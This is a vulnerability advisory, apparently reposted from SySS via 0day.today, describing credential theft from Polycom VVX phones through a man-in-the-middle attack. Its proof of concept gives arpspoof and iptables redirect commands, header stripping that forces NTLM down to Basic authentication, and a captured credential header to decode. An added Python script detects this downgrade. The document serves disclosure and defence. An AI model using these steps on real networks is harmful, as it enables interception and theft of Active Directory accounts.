Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle Vulnerability

25 Oct 2018 00:00:00, reported by Micha Borrmann. Type: zdt. Source: 0day.today. 75 views.

Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle Vulnerability

Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        X.509 validation - Man-in-the-Middle (CWE-300)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:             CVE-2018-18568
Author of Advisory:        Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used in an on-premise installation with
Skype for Business, the phone stores the credentials of an Active
Directory account. In a man-in-the-middle attack, the phone hands these
credentials to the attacker, and the account is therefore compromised.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone sends the stored credentials via HTTPS to a web server usually
named autodiscover, but it performs no X.509 certificate validation.
The credentials are sent using the challenge-response NetNTLM
algorithm; after a downgrade attack to HTTP basic authentication, they
can be harvested in Base64-encoded form.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Burp Suite is used as an invisible proxy.

Perform an ARP spoofing attack against the phone so that its traffic is
routed to the device on which Burp Suite is running. All attacks are
started from the same device.

# arpspoof -i eth0 -t 192.168.100.101 192.168.100.1

Set an iptables rule so that the traffic is redirected to Burp Suite, like

# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.101 -p tcp --dport 443 -j REDIRECT --to-port 8080

Enable rules in Burp Suite to suppress these two response headers:

WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM

Now, an authentication downgrade attack is in place, too.

Watch the proxy history for an HTTP POST request like

POST /autodiscover/autodiscover.xml HTTP/1.1
Content-Type: text/xml; charset=utf-8
Content-Length: 454
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en,*
User-Agent: Mozilla/5.0
Host: autodiscover.example.com
Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA==

Decode the harvested Base64-encoded credential information.
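A defender-side check, added here and not part of the SySS advisory: run over proxy or IDS records of the autodiscover exchange, it flags a Basic credential sent to the autodiscover path (reporting only the account, never the password, so the right account can be reset) and a 401 challenge that offers Basic without Negotiate or NTLM, which is the signature of the downgrade described above. The sample messages are constructed from the request quoted above plus an assumed 401 response; the function and variable names are my own.

```python
import base64, binascii

# Constructed sample, not a real capture: the request quoted in the advisory
# (example credential) and an assumed 401 whose Negotiate/NTLM headers were stripped.
SAMPLE_EXCHANGE = [
    ("request", [
        "POST /autodiscover/autodiscover.xml HTTP/1.1",
        "Host: autodiscover.example.com",
        "Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA==",
    ]),
    ("response", [
        "HTTP/1.1 401 Unauthorized",
        'WWW-Authenticate: Basic realm="autodiscover.example.com"',
    ]),
]

def parse_message(lines):
    """Split one HTTP message into its start line and a lowercase-name -> [values] map."""
    start, *rest = lines
    headers = {}
    for line in rest:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return start, headers

def basic_auth_identity(header_value):
    """Return the DOMAIN\\user part of a Basic credential, or None when the header
    is not Basic or not decodable. The password is never returned."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    identity, _, _password = decoded.partition(":")
    return identity or None

def analyse(exchange):
    """Flag Basic credentials sent to an autodiscover path and Basic-only challenges."""
    findings = []
    for kind, lines in exchange:
        start, headers = parse_message(lines)
        if kind == "request" and "autodiscover" in start.split(" ")[1].lower():
            for identity in filter(None, map(basic_auth_identity, headers.get("authorization", []))):
                findings.append(f"Basic credential for {identity} sent to {start.split(' ')[1]}")
        elif kind == "response":
            schemes = {v.split(" ")[0].lower() for v in headers.get("www-authenticate", [])}
            if "basic" in schemes and not schemes & {"negotiate", "ntlm"}:
                findings.append("401 offers only Basic: possible NTLM-to-Basic downgrade")
    return findings
```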

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware, which integrates a trust store and enforces a
strict X.509 certificate validation policy.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-027.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

#  0day.today [2018-10-25]  #
